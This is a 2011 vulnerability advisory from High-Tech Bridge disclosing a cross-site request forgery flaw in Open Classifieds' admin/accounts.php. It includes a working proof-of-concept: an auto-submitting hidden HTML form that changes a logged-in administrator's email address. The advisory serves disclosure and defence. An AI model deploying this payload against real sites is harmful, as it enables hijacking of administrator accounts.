Cross-site Request Forgery (CSRF) in Open Classifieds

2011-04-28T00:00:00
ID HTB22980
Type htbridge
Reporter High-Tech Bridge
Modified 2011-04-28T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered vulnerability in Open Classifieds which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) in Open Classifieds
The vulnerability exists due to insufficient validation of the request origin in admin/accounts.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify administrator`s email address.
Exploitation example:
<form action="http://host/admin/accounts.php" method="post" name="main">
<input type="hidden" name="name" value="myaccount">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="account" value="">
<input type="hidden" name="action" value="new">
</form>
<script>
document.main.submit();
</script>